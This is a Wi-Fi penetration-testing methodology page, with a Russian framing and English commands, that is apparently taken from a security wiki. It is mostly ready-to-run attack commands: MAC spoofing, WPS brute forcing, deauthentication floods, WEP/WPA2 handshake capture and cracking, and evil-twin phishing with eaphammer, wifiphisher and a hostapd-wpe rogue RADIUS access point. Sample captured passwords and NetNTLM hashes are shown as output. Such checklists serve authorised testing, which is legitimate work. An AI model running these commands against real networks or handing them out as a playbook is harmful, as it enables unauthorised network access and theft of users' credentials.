Wi‑Fi (раздел)
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.
:::
Порядок действий
- Подтвердите разрешение на активные действия и уведомите мониторинг (SOC), если требуется.
- Выполните сканирование и перечисление в согласованных пределах.
- Углубляйтесь в сервисы по мере находок; фиксируйте версии и конфигурации.
- Синтаксис команд в методике не локализуется.
Методика
MAC address access control
# 1. Option
sudo macchanger -m <XX:XX:XX:XX:XX:XX> <IF>
# 2. Option
sudo ifconfig <IF> down
sudo ifconfig <IF> hw ether <XX:XX:XX:XX:XX:XX>
sudo ifconfig <IF> up
Authentication tests
WPS Attacks
sudo reaver -i <MON_IF> -b <AP_MAC> -vvNwf [-K {1|2|3}] -c <CHANNEL>
sudo bully <MON_IF> -b <AP_MAC> -c <CHANNEL> -S -F -B -v 3
sudo reaver -i <MON_IF> -b <AP_MAC> -vvNwf -c <CHANNEL> -p <FOUND_IP>
Capture and Handshake cracking
Wired Equivalent Privacy (WEP)
besside-ng -c <CHANNEL> -b <BSSID_MAC> <MON_IF>
Wi-Fi Protected Access (WPA2-PSK)
airodump-ng --bssid <TARGET_BSSID> -c <CHANNEL> --write <OUTPUT_CAP> <MON_I>
# The whole network
aireplay-ng -0 <NUM_DEAUTH_PKTS> -a <TARGET_BSSID> <MON_IF>
# A client
aireplay-ng -0 100 -a <TARGET_BSSID> -c <CLIENT_MAC> <MON_IF>
# Aircrack
aircrack-ng -w <WORDLIST> -b <TARGET_BSSID> <FILE_CAP>
#Hashcat
hcxpcapngtool $(find . -name *.cap) -o <HANDSHAKES.txt>
hashcat -m 22000 <HANDSHAKES.TXT> <WORDLIST.TXT>
crunch <MIN_LENGTH> <MAX_LENGTH> <CHARACTERS> | aircrack-ng -w - -b <TARGET_BSSID> <FILE_PCAP>
Phishing
WPA-PSK
# The obtained file is: loot/wpa_handshake_capture*.hccapx
sudo ./eaphammer -i <IF> --channel <CHANNEL> --auth wpa-psk --essid <TARGET_ESSID> --ssid <TARGET_BSSID> --creds
./hcxhash2cap --hccapx=<HANDSHAKE.hccapx> -c <OUTPUT.cap>
./hcxpcapngtool <OUTPUT.cap> -o <HASH.TXT>
hashcat -a 0 -m 22000 <HASH.TXT> <WORDLIST.TXT>
sudo wifiphiser
[...]
[*] POST request from 10.0.0.61 with wfphshr-wpa-password=password1234
WIFI-Enterprise
Eaphammer - Kali
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
sudo ./kali-setup
# Create the certificate with the data of your victim's certificate in order to be more trusted.
sudo python3 eaphammer --cert-wizard
sudo python3 eaphammer -i <IF> --channel <CHANNEL> --auth wpa-eap --essid <VICTIMS_SSID> --creds
[...]
# Mobile
username: pepe
password: palotes
[...]
# Windows
domain\username: pepe
username: pepe
challenge: c9:fa:47:6b:34:ca:b4:ea
response: 25:44:19:55:4f:a1:9f:b5:68:00:58:67:e3:58:00:ed:6f:0d:3d:6f:b2:7d:63:ab
jtr NETNTLM: pepe:$NETNTLM$c9fa476b34cab4ea$254419554fa19fb568005867e35800ed6f0d3d6fb27d63ab
hashcat NETNTLM: pepe::::254419554fa19fb568005867e35800ed6f0d3d6fb27d63ab:c9fa476b34cab4ea
Hostpad-wpe (Pinneaple v2.1.0)
# Installation
wget https://github.com/jekkos/hostapd-wpe-openwrt/releases/download/2/hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk
wget https://github.com/jekkos/hostapd-wpe-openwrt/releases/download/2/hostapd-wpe_git-2_mips_24kc.ipk
scp hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk root@<PINEAPPLE_IP>:/tmp/
scp hostapd-wpe_git-2_mips_24kc.ipk root@<PINEAPPLE_IP>:/tmp/
opkg install /tmp/hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk
opkg install /tmp/hostapd-wpe_git-2_mips_24kc.ipk
opkg update && opkg install coreutils-nohup
# Configuration
# By default it doesn't show the challgenge respose, so we need to add the following lines
echo "eap_server=1" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_a_id=101112131415161718191a1b1c1d1e1f" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_a_id_info=hostapd-wpe" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_prov=3" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "ieee8021x=1" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_key_lifetime=604800" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_key_refresh_time=86400" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f" >> /etc/hostapd-wpe/hostapd-wpe.conf
sed -i 's/^ctrl_interface=\/var\/run\/hostapd$/&-wpe/' /etc/hostapd-wpe/hostapd-wpe.conf
sudo vim /etc/hostapd-wpe/hostapd-wpe.conf
[...]
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=<WIRELESS_IF>
[...]
# 802.11 Options
ssid=<SSID_NAME>
channel=<VICTIM_SSID_CHANNEL>
aireplay-ng -0 <#PACKETS_TO_SEND> -a <AP_BSSID> <IF>
sudo hostapd-wpe -i <IF> -k -s /etc/hostapd-wpe/hostapd-wpe.conf
[...]
mschapv2: Thu Jun 9 07:04:16 2022
username: pepito
challenge: 35:0a:18:49:63:83:ee:76
response: fc:65:5a:02:73:9f:89:a5:95:e5:8e:8f:4b:1b:72:0e:9e:d1:04:03:ee:b5:bd:ea
jtr NETNTLM: pepito:$NETNTLM$350a18496383ee76$fc655a02739f89a595e58e8f4b1b720e9ed10403eeb5bdea
hashcat NETNTLM: pepito::::fc655a02739f89a595e58e8f4b1b720e9ed10403eeb5bdea:350a18496383ee76
hashcat -m 5500 <HASHCAT_NETNTLM_FILE> <WORLDIST>
Simple Radius AP with Internet
Installation
sudo apt install hostapd-wpe hostapd dnsmasq iptables-persistent -y
interface=wlan0
listen-address=127.0.0.1
dhcp-range=10.0.0.3,10.0.0.20,255.255.255.0,12h
server=8.8.8.8
server=8.8.4.4
DNSStubListener=no
* PEAP,TTLS,TLS,FAST
"test" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "test" [2]
"user" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "password" [2]
echo net.ipv4.ip_forward=1 | sudo tee -a /etc/sysctl.conf
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
Execution
sudo ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0
sudo systemctl restart dnsmasq
sudo hostapd -i wlan0 /etc/hostapd-wpe/hostapd-wpe.conf